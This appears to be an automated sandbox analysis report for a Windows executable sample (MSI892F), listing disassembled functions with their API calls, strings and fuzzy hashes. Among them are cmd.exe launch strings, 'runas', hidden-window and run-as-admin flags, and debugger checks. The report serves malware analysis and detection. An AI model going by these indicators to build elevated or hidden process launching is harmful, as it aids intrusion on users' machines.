API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: daa54a767ca47f70e439a6a654c2d60ecc68a2013c3433160c7ce40a954a2d3f
Instruction ID: ffea3e422a7035efaf94baccc592c7cc8f6fb44f5c2d4be06a2aa175ab2b6a6b
Opcode Fuzzy Hash: daa54a767ca47f70e439a6a654c2d60ecc68a2013c3433160c7ce40a954a2d3f
Instruction Fuzzy Hash: 38F01D74146301ABEB119F20FC49BAABBE8BB84704F50881AF984D22A0D379D55DDB63

Function 001A1A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(08E011E3,?,0000FFFF), ref: 001A1A4D

Part of subcall function 00194EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00194EDD

ExitProcess.KERNEL32 ref: 001A1C27

Part of subcall function 00198790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0019880D

Strings

Full command line:, xrefs: 001A1A7E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: 82dd86f80be45decd82fa72d9928dfc171c1b7cabf61c0ddd27169f9a5cf61c1
Instruction ID: 707cd6b2b1b4920d9e9d7e5ea48dbe01c7c2117af06a73d851cb5e608f8ac14a
Opcode Fuzzy Hash: 82dd86f80be45decd82fa72d9928dfc171c1b7cabf61c0ddd27169f9a5cf61c1
Instruction Fuzzy Hash: 0E51A234C151289BCF15EB60CC59BEEB7B5AF21314F1441D9E009A72A2EF741F89CBA1

Function 00197FD0 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00197FA8,08E011E3), ref: 00198044
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00197FA8,08E011E3), ref: 0019804E
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00197FA8,08E011E3), ref: 001980AA

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: f035b81b7f52b6e18a3d597e2072e59498eb111673c7463ed0e04fae81f1cac4
Instruction ID: a3df9a602bb4a8ab689037b7d0d3bc2bc869f3eb39622925887bc0da30c75540
Opcode Fuzzy Hash: f035b81b7f52b6e18a3d597e2072e59498eb111673c7463ed0e04fae81f1cac4
Instruction Fuzzy Hash: C7318971A00205AFDB24CFA9CC45BAFFBF9FB45710F24452AF515E7280DBB5A9048BA0

Function 001CC72B Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,001CAFDA,00000001,00000364,?,00000006,000000FF,?,001BC282,?,?,?), ref: 001CC76C

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 68fd3a8d8cc2522324224efc12bee1fe389a47454bb987799de05695a59a2cd1
Instruction ID: 44c063df45ee228fdaabf396ecae25ff6001dccedc08a513ca4fc811e24636a2
Opcode Fuzzy Hash: 68fd3a8d8cc2522324224efc12bee1fe389a47454bb987799de05695a59a2cd1
Instruction Fuzzy Hash: E5F0B43150132467EB225B259C45F6B7788DF71771B15411AE90CE6680CB20DC018EE1

Non-executed Functions

Function 00197660 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 384
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 0019781F
GetForegroundWindow.USER32(?,?), ref: 001978A4
ShellExecuteExW.SHELL32(?), ref: 001978C1
ShellExecuteExW.SHELL32(?), ref: 001978FF
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00197942
GetProcAddress.KERNEL32(00000000), ref: 00197949
AllowSetForegroundWindow.USER32(00000000), ref: 00197953
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00197973
GetProcAddress.KERNEL32(00000000), ref: 0019797A
Sleep.KERNEL32(00000064,?,?,?), ref: 00197997
EnumWindows.USER32(00197A90,?), ref: 001979B3
BringWindowToTop.USER32(?), ref: 001979C2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 001979DF
GetExitCodeProcess.KERNEL32(?,?), ref: 001979EC

Part of subcall function 00197D30: CloseHandle.KERNEL32(?,08E011E3,00000010,00000010,?,?), ref: 00197D72

GetWindowThreadProcessId.USER32(?,?), ref: 00197A9C
GetWindowLongW.USER32(?,000000F0), ref: 00197AB4

Strings

runas, xrefs: 00197874
.bat, xrefs: 001977AA
GetProcessId, xrefs: 00197938, 00197969
Kernel32.dll, xrefs: 0019793D, 0019796E
%s\System32\cmd.exe, xrefs: 0019782C
.cmd, xrefs: 001977E0
/C ""%s" %s", xrefs: 00197844
open, xrefs: 00197858

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
API String ID: 1023610922-986041216
Opcode ID: 2039273d7d25baa82d3d586f6548452a94f09ba7b5333737cca6a866d10fdfbf
Instruction ID: a5bb03d5108a55b48b897d2cccbab0761b98050049d7b0b009c108c05b170b23
Opcode Fuzzy Hash: 2039273d7d25baa82d3d586f6548452a94f09ba7b5333737cca6a866d10fdfbf
Instruction Fuzzy Hash: 65E1BE71A15209DFDF10DFA8C888AAEBBF9FF14314F148169E515EB291EB309E41CB60

Function 0019D060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0019D200
LocalFree.KERNEL32(00000000), ref: 0019D257
_swprintf.LIBCMT ref: 0019D440
LocalFree.KERNEL32(00000000), ref: 0019D497
_swprintf.LIBCMT ref: 0019D592

Strings

+, xrefs: 0019D506
%, xrefs: 0019D519

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID: %$+
API String ID: 2429749586-2626897407
Opcode ID: 66446b77ec6a5353bae3ff9b9e8b3562c37fa7214af1b8d137933718584b81fc
Instruction ID: 5cdb789bfb86f466de60af9473a368e9e0eee08d5836321e87ea0bdc0b084ccf
Opcode Fuzzy Hash: 66446b77ec6a5353bae3ff9b9e8b3562c37fa7214af1b8d137933718584b81fc
Instruction Fuzzy Hash: 7F02B071E102199FDF19DFA8EC54BAEBBB5FF49300F148629F811AB281D734A941CB91

Function 001A0E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 001A12C4
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,001F57C0,00000800), ref: 001A12E1

Strings

/HideWindow, xrefs: 001A1075, 001A107F, 001A10AC, 001A10BC, 001A10DB
/RunAsAdmin , xrefs: 001A0FCE, 001A0FD9, 001A1003, 001A1013, 001A1032
/DontWait , xrefs: 001A0F37, 001A0F40, 001A0F6C, 001A0F8E
/EnforcedRunAsAdmin , xrefs: 001A0EB0, 001A0EBA, 001A0EE3, 001A0F01

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
API String ID: 4153817207-1914306501
Opcode ID: e620c7e3c7ccf525270a5ac6aa67c56b9a5b6e983935a60c4b1c6e32b7e96402
Instruction ID: a0f870d57ec9fe33905e441f5b931318d83b6ed5189c988f3decb4ec009fe6df
Opcode Fuzzy Hash: e620c7e3c7ccf525270a5ac6aa67c56b9a5b6e983935a60c4b1c6e32b7e96402
Instruction Fuzzy Hash: 75E1002DA043529BCB359F24C980277B3E2FF9BB50F598469E885DB691E771CC82C391

Function 001961D0 Relevance: 10.7, APIs: 7, Instructions: 234processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00196242
CloseHandle.KERNEL32(00000000), ref: 00196285
Process32FirstW.KERNEL32(00000000,0000022C), ref: 001962E1
OpenProcess.KERNEL32(00000410,00000000,?), ref: 001962FD
CloseHandle.KERNEL32(00000000), ref: 00196445
Process32NextW.KERNEL32(?,0000022C), ref: 00196463
CloseHandle.KERNEL32(00000000), ref: 0019648E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 708755948-0
Opcode ID: 53593698e29f4d9ebae4271ffcea3b4c759dceca0438c62ee9f4eb8f414568bf
Instruction ID: 7e692b330e3136ef16a3775c66eb65ca5b6768afd979539c8f9b4e3539db15be
Opcode Fuzzy Hash: 53593698e29f4d9ebae4271ffcea3b4c759dceca0438c62ee9f4eb8f414568bf
Instruction Fuzzy Hash: 8CA17C70906669DBDF20DF64DD48BDEBBB4EF44704F1082DAE419A7280D7B85A84CF90

Function 001D4609 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001D47ED

Strings

1#INF, xrefs: 001D473F
1#SNAN, xrefs: 001D4715
1#QNAN, xrefs: 001D471C
1#IND, xrefs: 001D470E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: b2d47408237f714df24e62186f1a7542a2ff99db04950e5e71e5cd9a57875215
Instruction ID: 1957ded49224200f8e242197dc3c2a9c86d952c1dc34a675122a3c0c011980ad
Opcode Fuzzy Hash: b2d47408237f714df24e62186f1a7542a2ff99db04950e5e71e5cd9a57875215
Instruction Fuzzy Hash: 04D22B71E086298FDB65CE28CD407EAB7B6EB54305F1541EBD44EE7240EB74AE818F41

Function 001D3BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001D3EC1,00000002,00000000,?,?,?,001D3EC1,?,00000000), ref: 001D3C3C
GetLocaleInfoW.KERNEL32(?,20001004,001D3EC1,00000002,00000000,?,?,?,001D3EC1,?,00000000), ref: 001D3C65
GetACP.KERNEL32(?,?,001D3EC1,?,00000000), ref: 001D3C7A

Strings

ACP, xrefs: 001D3BC1
OCP, xrefs: 001D3BF7

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d694758d57914e3263614e381a329afd0e8a18e695a41402629a499707992a81
Instruction ID: dc85b22f726a440b162fd1424a1559fa5646b4c5fdee7c75f3c2f891dec8e9b7
Opcode Fuzzy Hash: d694758d57914e3263614e381a329afd0e8a18e695a41402629a499707992a81
Instruction Fuzzy Hash: 1E218372711101BADB38CF65D941B97B3A6EF50B60B568427E92AE7310E732EF40C351

Function 001D3D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001D3E84
IsValidCodePage.KERNEL32(00000000), ref: 001D3ECD
IsValidLocale.KERNEL32(?,00000001), ref: 001D3EDC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001D3F24
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001D3F43

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3faa943af92e4ef5bc91a9effebbc9b8ad6bbdf2a733bc53d6a04f0b89711930
Instruction ID: 742fe56720492cc9f3c880fb7862f2c64154662c444de62216274b7f4de26c51
Opcode Fuzzy Hash: 3faa943af92e4ef5bc91a9effebbc9b8ad6bbdf2a733bc53d6a04f0b89711930
Instruction Fuzzy Hash: 50518F72A00209ABDF10DFA5DC45ABE77B8EF58700F14452AE924E7290EB70DB44CB62

Function 001CB336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001CB3C3

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
Instruction ID: 14f537d205214a7ff354abb1aad072ae176d7492462ae587f0b5df96f1c5b2c7
Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
Instruction Fuzzy Hash: 9EB125729082559FDB158F68C8D2FEEBBA5EF69310F15816EE805EB242D335DD01CBA0

Function 001D069D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 001D0738
FindNextFileW.KERNEL32(00000000,?), ref: 001D07B3
FindClose.KERNEL32(00000000), ref: 001D07D5
FindClose.KERNEL32(00000000), ref: 001D07F8

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 8d5dc2e6857fe99c8dd18b1826ef37626d68ebdfb7d219a9cda7a95bfbfdbf62
Instruction ID: 5528bf2a29ab3e547791adf8765fea0ec3fd9ca280681e9d1dc21be2eb02f9fe
Opcode Fuzzy Hash: 8d5dc2e6857fe99c8dd18b1826ef37626d68ebdfb7d219a9cda7a95bfbfdbf62
Instruction Fuzzy Hash: A941A671D01229AEDB21DF68DC88BAEB778EB89304F144197E445D7241E770AE80CF60

Function 001B83BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001B83C9
IsDebuggerPresent.KERNEL32 ref: 001B8495
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001B84B5
UnhandledExceptionFilter.KERNEL32(?), ref: 001B84BF

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d0f6c2b73b2d2352f734d10fad7030d65572b398929e3e7ad51d3350499874dd
Instruction ID: d385673f0829f5226fc48c6d6c48283962c3fce5a76771b4b7a1af933c33c329
Opcode Fuzzy Hash: d0f6c2b73b2d2352f734d10fad7030d65572b398929e3e7ad51d3350499874dd
Instruction Fuzzy Hash: 03312B75D0221C9BDB20DF64DD497CDBBF8AF14700F10409AE50DAB250EB719A85CF45

Function 001A2161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00193270,?), ref: 001A2176
FormatMessageA.KERNEL32(00001300,00000000,08E011E3,00000000,00000000,00000000,00000000,?,?,?,00193270,?), ref: 001A2198

Strings

!x-sys-default-locale, xrefs: 001A2171

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: fd775845d9314df03df75a9e1394d5f9be3e903a127d4ac076c01b7f4fe3651c
Instruction ID: a06b539a849dec3f02e54f93b1d0cb5ad023fa6e198c735ba810bf7ee5a6075f
Opcode Fuzzy Hash: fd775845d9314df03df75a9e1394d5f9be3e903a127d4ac076c01b7f4fe3651c
Instruction Fuzzy Hash: 0DE06DB6151118BFFB04AFA4DC0BDBF7BADEB05791F004115B901D6180E2B0AE40CBA0

Function 001D3827 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001D387B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001D38C5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001D398B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 116e44d3a1cc8296c64f31480633973387b880f7b2f59c82b7e8f6591fcf4ebb
Instruction ID: fbe81c1da65ea543f8d134d44af54b9841887fa7df0ae2231c5ebd0850c1e505
Opcode Fuzzy Hash: 116e44d3a1cc8296c64f31480633973387b880f7b2f59c82b7e8f6591fcf4ebb
Instruction Fuzzy Hash: E961C471A002079FDB28DF28CC82BBAB7A8EF14314F14417BE925C7681E775EA85CB51

Function 001BC3B6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001BC4AE
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001BC4B8
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 001BC4C5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 776082a34db7796e4b3cf142438560ef952daf5c376b16c44a8a22738559ed39
Instruction ID: 522ffb3ff8873d8c5ef0c0cdf6c308849baa5055669b7b628ef594302ee8e833
Opcode Fuzzy Hash: 776082a34db7796e4b3cf142438560ef952daf5c376b16c44a8a22738559ed39
Instruction Fuzzy Hash: 0431B274901229ABCB21DF68DC897DDBBB8BF58710F5041EAE41CA6290EB709F858F44

Function 00191D70 Relevance: 4.6, APIs: 3, Instructions: 65COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,08E011E3,00000001,00000000,?,00000000,001D9360,000000FF,?,00191D1C,00000010,?,?,?,-00000010), ref: 00191D9B
LockResource.KERNEL32(00000000,?,00191D1C,00000010,?,?,?,-00000010,001D9340,000000FF,?,0019202C,?,00000000,001D938D,000000FF), ref: 00191DA6
SizeofResource.KERNEL32(00000000,00000000,?,00191D1C,00000010,?,?,?,-00000010,001D9340,000000FF,?,0019202C,?,00000000,001D938D), ref: 00191DB4

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 9801d3cdee6536add18e393c3b4b7f9ab2f1a3a1615471bc2363cec11a39119e
Instruction ID: 6c178c369363192faea43d28911e285cefa967ad42ba6b0b01d4b7171b7115a3
